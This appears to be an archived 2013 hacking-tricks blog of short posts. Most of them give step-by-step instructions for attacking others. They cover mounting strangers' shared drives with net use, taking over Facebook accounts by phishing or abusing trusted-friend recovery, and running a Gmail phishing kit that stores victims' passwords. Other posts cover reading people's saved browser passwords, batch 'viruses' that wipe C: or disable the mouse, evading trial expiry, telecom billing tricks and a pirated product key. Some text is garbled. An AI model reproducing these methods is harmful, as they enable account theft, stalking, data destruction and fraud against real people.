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Friday 15 February 2013

Chat with Friends through Command Prompt

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

 @echo off




 set /p n=User:

 set /p m=Message:

 net send %n% %m%


 Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.
6) You would then see something like this:

7) Now, type the IP Address of the computer you want to contact and press enter

You will see something like this:

8) Now all you need to do is type your message and press Enter.

Start Chatting.......!

Advance Operating System

New Advance Operating System Designed For Security..!!

Qubes is an open source operating system designed to provide strong security for desktop computing. Qubes is based on Xen, X Window System, and Linux, and can run most Linux applications and utilize most of the Linux drivers.

In the future it might also run Windows apps.
Whonix: Anonymous OS
Whonix has called TorBOX  is an anonymous general purpose operating system based on Virtual Box, Debian GNU/Linux and Tor.

By Whonix design, IP and DNS leaks are impossible. Not even malware with root rights can find out the user's real IP/location.

This is because Whonix consists of two (virtual) machines. One machine solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other machine, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.

Whonix is produced independently from the Tor (r) anonymity software and carries no guarantee from The Tor Project about quality, suitability or anything else. Due to trademark issues the project was renamed to Whonix.

Key architecture features:
Based on a secure bare-metal hypervisor (Xen)

Networking code sand-boxed in an unprivileged VM (using IOMMU/VT-d)

No networking code in the privileged domain (dom0)

All user applications run in “AppVMs”, lightweight VMs based on Linux

Centralized updates of all AppVMs based on the same template

Qubes GUI virtualization presents applications like if they were running locally

Qubes GUI provides isolation between apps sharing the same desktop

Storage drivers and backends sand-boxed in an unprivileged virtual machine(*)

Secure system boot based on Intel TXT(*)

Wednesday 13 February 2013

How to use Trial Version Forever without Expiration

Ever wondered that ‘how to install trial version again? or even better than that like ‘how to use a trial version forever?‘ or ‘How to stop trial time?‘

Download any Trial software and use it for unlimited time. You can use any software forever without expiration you want. You can download trial version, right. Trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and will not expire or cease to work. You do not have to change your system clock. This little software does the trick.

Time Stopper is the software which can stop the time for try out version software. When you stop the time you can use your try-out software forever. When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time and date run normally on your system. You can use any number of try-out version software with this software.

How Time Stopper Works

·         Open Time Stopper
·         Browse and select .exe of required trial software
·         Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)
·         Choose any time
·         Click open software on your selected date

If you wish to create an icon for your modified trial software and do not want to open Time stopper every time then use last button in software to create new icon. open that trial software after that from that newly created icon always otherwise it can expire.
Download Time Stopper

Tuesday 12 February 2013

How to Hack another computer Hard Disk using Command Prompt - CMD


1. Open command prompt (CMD)
2. In the command prompt use the “net view” command


Example: C:\>net view \\

The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “″ is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in its place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.

3. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.


C:\>net use D: \\\F



C:\>net use I: \\\Myprint

NOTE: In Examples 1, 2 & 3, D: G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.


F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “″ is the IP address of remote computer that you want to hack.

4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.

Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.

NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed in Gaining Access to Remote Computer through Netbios. That is Netbios Hacking Is Not Possible In This Situation. (An Error Message Is Displayed). So Repeat The Procedure 2, 3 With Different IP Address.

Enjoy Hacking….!!

How to hack Facebook

Now a days Facebook becomes the number#1 social networking portal that touches every one’s life. People are now a days looking for hacking of Facebook account to steal someone's’ personal life. 60% people are looking for control over their girlfriends Facebook account ..!!. A lot of people contact me about suspecting their boyfriend/girlfriend of cheating, They ask for a Tutorial for hacking Facebook Account passwords. There are many websites that give  guarantee to hack Facebook account and try to sell video that demonstrate hacking of Facebook. also many websites are try to sell products by marketing slogan like”hack Facebook account for free”.

Different Ways to Hack Facebook Account
Facebook account can be hack from one of following ways.

·         Facebook Phishing
·         By use of Key logger
·         Facebook Account hack with get control on Primary email address
Facebook Phishing Attack :

This is one of the most popular methods to hack Facebook account online.also it is the one of the best popular and favorite method for Facebook hackers. Phishing not only allows you to hack Facebook but also can be used to hack any email account. You have to only get the trick used to make a phisher, which i think is very easy. Phishing is one of the easiest methods to foll someone and get Facebook account password. I mention the process for educational purpose only.I will go explaing in details on my next article on How to hack Facebook password.

Use Key logger to hack  Facebook passwords

Installing key-logger on victims machine and later read key logs to gain access to hack  facebook account for free. To Install keylogger, you should have a physical access to  victim’s case, you don’t have , then you can install key-logger remotely.

What a key-logger does is it stores the keystrokes into a text log file and then these  logs can be used to  get required Facebook password and you can  hack Facebook Account.

Et access to Primary email address to hack someone’s Facebook account

let say,if you want to gain access  to someones account, i think hacking victims email address(Primary email address of Facebook) is easier than hacking of facebook. Most of the users uses 1 gmail or yahoo account email address as as primary email address. A genius hacker can easily gain over victims’ gmail account or yahoo email account.

After gaining control over primary email address of facebook, you simply use the  Forgot password” facility that will ask Facebook to send password reset email to your primary email address- which is already hacked.

Thus, your Facebook account password will be reset and to hack Facebook account you already have another alternative as well !!!

You Must Know : about to hack a Facebook account details

From my goggling and research, I found above three methods for gaining access of Facebook account information as the best and working.If you know, any others alternative  ways to hack facebook account passwords, please do share your suggestions to get better awareness about facebook secuiry .

I never encourage hacking Facebook or any email account,,I just wanna make you aware about Facebook security and related risk involve with primary email address of Facebook. I will appreciate your effort if you discuss about how we can keep facebook account secured. Chand2 Like  

How to hack a Gmail account

Today i am going to teach you how to hack a gmail account.There are many ways to hack a gmail account.Even i searched for the tips and tricks to hack a gmail  password.I found lots of ways to hack gmail account.But most of the webmasters cheating the users by selling fake gmail hacking softwares or tools actually there is no use with those gmail hacks.Among all the ways to hack a gmai account , i found Phishing is easy and workable.Its the only gmail hacking trick available to all standards of users.This is the best gmail hacking trick without using any software.

Phishing means sending a link of a fake gmail login page which appear like the gmail original login page and tempting the users to login in that fake gmail  login page.Then the passwords entered in that gmail hack page will be saved automatically in your free hosting account.The process to hack a gmail account  is explained below.

Step1: Download fake gmail login page from the link given below

Click hear Download       
index.htm – html page that exactly looks similar to the original gmail login page

pass.php – php script that stores login information to the gmailPasswords.htm

gmailPasswords.htm – page where are login information of gmail accounts stored
Step2: Extract the files of gmail hack zip into another folder

Step3: Create an id in

There are many leading free hosting services for hacking a gmail account.But its better to choose my3gb because its very comfortable and registration is also easy.So choose this to hack any gmail account. 

Step4: Then upload the contents of hack a Gmail  into a directory(For that, after creating an id you should go to file manager and upload all these files)

Step5: After that go and click on  the file ServiceLoginAuth.htm  then a fake Gmail page will be opened now enter any username and password check they are saved in the file passwrd.htm

Step5: For viewing the passwords and id's just go to your account in and open the file passwrd.htm.

Step6: Copy the link of the fake gmail account login page from your browser at the time you opened the fake gmail login page.

Step7: Now you have to send a mail with this link to gmail account which you wanted to hack.

you hack to convince that gmail account owner to click on the link. Select the method you have known offering lottery money,offering products, free content, tour tickets etc.

At last you have to say click hear to login to your gmail account and claim your offer.

If you follow the above process you will  hack any gmail account with in few hours.

Sunday 10 February 2013

What is RAT (Remote Access Trojan)?

What is RAT?
As i have told you in my introduction paragraph RAT is Remote Access Trojan. It is a piece of software or program which hacker uses to get complete control of your computer. It can be send to you in form of images, videos or any other files. There is some RAT that even your antivirus software cannot detect.  So always be sure about what you are downloading from the internet and never save or download files that anonymous user send you over the mail or in chat room.

What you can do with RAT?
Once a RAT is installed on any computer hacker can do almost anything with that computer. Some malicious tasks that you can do with RAT are listed below:

Infecting Files
Installing Keyloggers
Controlling Computer
Remotely start webcam, sounds, movies etc.
Using your PC to attack Website (DDOS)
View Screen

Harmless RAT or Good RAT
As you have seen how harmful RAT are for your computer, but their are some good RAT which some of you might be using daily. You might have heard of TeamViewer, it is a software which you use to control some one's computer with his permission for file transfer, sharing your screen and more.

Some Commonly Used RAT
CyberGate RAT
DarkComet RAT

Saturday 9 February 2013

How to Hack Facebook Account

Hence we know that there are many techniques for Hack Facebook Account like Phishing Attacks, Keylogging and other Social techniques but today we are going to see how to hack passwords using new feature introduced by Facebook the 3 Trusted Friends Password Recovery Feature in this what happens if you have lost your password and you don’t have any access to your default email address than this feature will handy by sending request to your 3 trusted friends and hence gaining your account password again.

For this technique you need to create 3 fake Facebook account and you need to surely add these as friends into your victims account whose account you are going to hack.

After success full addition of your fake accounts into victims account as friends follow the below steps .:

1. Go to Facebook and click Forgot your Password?

2. Then you will get something like below just enter the details you know about him enter his Username, email address and full name.

3. After entering everything check it again and click on search.

4. After successful search for the user Facebook will show some information about how many emails are linked to the account and there is simple option saying

No Longer has Access to These clicked that one.

5. Now it will promote you to enter a new email address on which you will get the password resetting option so enter your email address I suggest you creating a Fake or Temporary email address for safety purpose.

6. Then it will promote you to enter the Security well if you have some security guess about that one than that’s ok but if you don’t know it than simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page like below.
7. Now just click continue and facebook will ask you to choose 3 trusted friends choose the 3 fake profiles of your which you created and added into the victims account.
8. After selecting 3 accounts facebook will send security codes to these accounts just enter these codes and you will get Password Resetting email from Facebook on the account you created in Step5

That’s it now you are successful in Hacking Facebook Password with the 3 Trusted Friends Method.

Note: This trick only works if 3 trusted friends agree to give you the security code so its really important that you add your 3 fake accounts into your victims facebook account as a friend.

Friday 8 February 2013

Virus to Format Hard Disk!!!

Copy the below codes into Notepad.


Save the file as Format.exe

You have created your virus.


Make a virus that disable Mouse

Open Notepad and copy below codes

rem ---------------------------------

 rem Disable Mouse

 set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"

 reg delete %key%

 reg add %key% /v Start /t REG_DWORD /d 4

 rem ---------------------------------

Save this file as virus.bat

Done you just created your virus.

Make Dangerous Virus in a Minute

1. Open Notepad and copy below code into it.

@Echo off

 Del C:\ *.* |y

2. Save this file as virus.bat (Name can be anything but .bat is must)

3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

How to view saved password in Google chrome?

1. Open any website where password is saved by user. Here i will demonstrate with facebook but it will work on any website.

2. Right click on password (Dots or asterisks) as shown in below image.

3. Then click on Inspect element.

4. Then change Password to text as shown in below picture.

Before changing it will look like below:

<input type=”password” class=”inputtext” name=”pass” id=”pass” tabindex=”2”>

After changing it will look like below:

<input type=”text” class=”inputtext” name=”pass” id=”pass” tabindex=”2”>

5. Done now asterisk or dots will change to text.

How To Hack Saved Password In Firefox?

1. Open Firefox Web Browser

2. Then Click on Firefox > Option > Option as shown in below picture

3. Then a POP Up box will appear, in that go to security and click.

4. Now click on website whose password you want to see ans click. (Note: It will ask for confirmation so click on yes when dialog box appears)

5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password.

How to setup Video as Desktop Wallpaper

1. Open VLC Media Player. If you don't have it downloads it from Here  

2. Then Go to Tools > Preference or press CTRL + P and Select Video from left panel
3. Then Choose DirectX video output from output dropdown list

4. Save the changes ans restart VLC Media Player.

5. Play any video you would like to set as your desktop wallpaper.

6. Then click on Video and select DirectX Wallpaper from the dropdown list

7. Now Minimize vlc player and you will see your video running on your desktop as wallpaper.

8. If you want your default wallpaper back then uncheck DirectX Wallpaper from video dropdown list.

9. Hope you like this simple trick share your thought about this trick in comment section.

How to trace anyone who chats with you

Trace IP address of someone or friends in Facebook chat, Google chat-Gtalk, Messengers on windows: -

Follow my steps:
Step 1: Start -> All Programs -> Accessories -> Command Prompt
or go to start and type cmd in search box.
Now you command Prompt will open.

Step 2: Then start chat with your friend, who you want to find his/her place.

Step 3: Type the command "NETSTAT" in the command prompt.

It will trace the all activities of your network with IP address.

Step 4: Next Step is to trace that user using his/her IP address

To do so, use any IP tracer services like

And paste the IP address in the box that says "lookup this IP or website" and it will show you the location of the user.
Enjoy. If it is not working, leave your comments, I’ll help you.

How to Lock Folder without Software Using Batch File

Copy and paste the code given below in notepad and 'Save' it as batch file (with extension '.bat'). Any name will do.

Then you see a batch file.
Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.

Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.

If you want to unlock your files, double click the batch file again and you would be prompted for password. Enter the password and access the folder.

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Are you sure u want to Lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to Unlock folder set/p "pass=>" if NOT %pass%==type your password here goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker echo Folder Unlocked successfully goto End :FAIL echo Invalid password goto end :MDLOCKER md Locker echo Locker created successfully goto End :End

Free BSNL Unlimited GPRS Surfing Tricks 2012

Hey buddy, i know that you all are looking for some tricks to get free GPRS services on your mobiles or computers. Here i am telling you about Free BSNL GPRS Surfing Tricks 2012.This trick is very easy to implement. Only few lines of steps have to do. BSNL FREE GPRS Trick Proxy: - Port: - 9209 APN: -
Now Save This Settings...

BSNL 3G Hack trick to Unlimited Browsing at normal GPRS rate

Here is a 100 % working trick to unlimited use BSNL 3G at the cost of

Normal GPRS

First of all Buy a normal 2g bsnl's sim card and keep balance 50+ rs.

now activate gprs by sending sms GPRS PRE to 53733 It will be
activated in 24 hours, after activation get gprs settings by calling customer care

Now do e-recharge with 230 rs (or whatever unlimited plan exists in your area)
in it, After activation You have to chnage only one thing in yor 3G enabled cell.

Go to settings>tools>settings>phone&g
t;network>network mode> now select UMTS

THEN do manual searching for network u will fing bsnl 3g network there wid small 3g logo along wid its name, select it as default

Now see your data singnals logo, it is converted into 3G
You will get near about 500kbps to 1200 kbps speed

Remember use BSNLEGPRS or BSNLPREPAID as your access point

How to Trace a Mobile Number in India

How to trace a mobile number in India.
Trace & Track Indian Mobile Number Location, provider, type and other details by entering the mobile number below.
In India there are many pranks are going on, so to trace out the mobile numbers of a prank calls and the messages we can trace any mobile number.
We only can trace the location and the service provider of the mobile number, as you can find out owner of mobile number by going to the specific service provider and complaint about the prank.
The lists of the websites to trace a mobile numbers are.

How to install Visual Basic 6.0 for Windows 8 and Windows 7

First of Disabled Windows Defender and Antivirus Protection for your PC.
Than Go to your Visual Basic 6.0 setup directory and Find "Setup.exe" then Right click on Setup.exe and Go to "Compatibility".

Choose "Run this program in compatibility mode for : Windows XP (Service Pack 3)"
And Mark "Run this program as an administrator" and Press Ok
Install "Setup.exe" and Go, Go....

Product key of Visual Basic 6.0 Enterprise Edition
Key : 881-7306462

Any Problem during installation, then comment me and like my Facebook page.